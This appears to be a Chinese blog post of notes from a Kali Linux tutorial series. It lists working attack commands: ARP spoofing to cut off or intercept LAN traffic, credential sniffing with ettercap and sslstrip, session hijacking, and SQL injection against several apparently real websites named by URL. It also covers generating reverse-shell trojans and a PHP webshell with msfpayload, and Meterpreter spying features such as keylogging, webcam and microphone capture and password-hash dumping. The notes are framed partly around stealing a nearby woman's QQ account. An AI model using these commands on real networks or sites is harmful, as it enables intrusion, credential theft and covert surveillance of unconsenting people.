1. 程式人生 > >看kali教程的一些總結(i春秋上的kali吧教程)

看kali教程的一些總結(i春秋上的kali吧教程)

windows 雨滴 美化
區域網 斷網攻擊  arp攻擊 arpspoof -i  網絡卡 -t 目標ip 閘道器
                檢視區域網當中的ip   Fping -asg  網段

獲取內網妹子的qq

arp欺騙   :  目標的IP流量經過我的網絡卡,從網關出去
arp斷網 :沒有從網關出去

進行IP流量轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 寫命令,不會有回顯
可以ping通
此時:arp成功欺騙,不會出現斷網現象

場景回顧:
arp欺騙成功  ==

driftnet     --> 獲取本機網絡卡的圖片

目標 --》 我的網絡卡 --》閘道器
 
 看我的網絡卡的圖片資訊

 Driftnet  -i  eth0

 第八課 http賬號密碼獲取


  開啟IP轉發
  1、echo 1 > /proc/sys/net/ipv4/ip_forward

  2、arpspoof  欺騙

  3、ettercap -Tq -i eth0

  -Tq  文字模式   

  第九課 https賬號密碼獲取


  配置一下


  同上

  3、sslstrip -a -f -  》 https的連結還原為http


第十課 會話劫持
arpspoof  
wireshark 抓包
ferret  重新生成抓包後的檔案
hamster  重放流量


sqlmap
asp http://www.czypjx.com/News_show.asp?id=113
asp  www.wisefund.com.cn  cookie 注入

php www.ggec.com.cn 注入

第十五課
msfpayload 生成木馬

use exploit  windows/meterpreter/reverse_tcp
使用這個shellcode

第十六課

如何使用木馬:
help

木馬常用功能:
background 後臺執行
session -l 列出所有會話
session -i id 進入會話

注入程序 : 木馬隨時有可能被結束掉的
ps  得到我們要注入的PID程序
Migtrate    xxx  注入  

   2036  2004  exlore.exe 桌面程序
migrate  2036

run  vnc  開啟遠端桌面

檔案管理功能 :
download     下載檔案
edit          編輯檔案
cat           檢視檔案
mkdir         建立資料夾
mv            移動檔案
rm            刪除檔案
upload        上傳檔案
rmdir          刪除資料夾

網路及檔案操作
arp      看ARP緩衝表
ifconfig    Ip地址
netstat      檢視埠連線

kill       結束程序
ps          檢視程序
reboot      重啟電腦
reg           修改登錄檔
shell        獲取shell
shutdown      關閉電腦
sysinfo      獲取電腦資訊


使用者操作和其它功能講解
enumdesktops      --使用者登入數
keyscan_dump      鍵盤記錄下載--下載
keyscan_start       -----開始
keyscan_stop        -----停止

uncil   disenable/enable keyboard
uncil   disenable mounse?
      獲取鍵盤滑鼠控制權

record_mic     -h  音訊錄製
webcam_chat          檢視攝像頭介面
webcam_list           攝像頭列表
webcam_stream        攝像頭視訊獲取
getsystem          獲取高許可權
hashdump     獲取hash密文

第十八課 msf之安卓滲透

msfpayload  android/meterpreter/reverse_tcp
             使用這個shellcode

第十九課  msf 藍屏攻擊
 DDOS
 ms12_202 然並卵吧

 第二十課 msf之生成webshell以及應用
   1、在msf中生成一個php指令碼  
   msfpayload  php/meterpreter/reverse_tcp LHOST=ip  R > web.php
   2、同上
   execute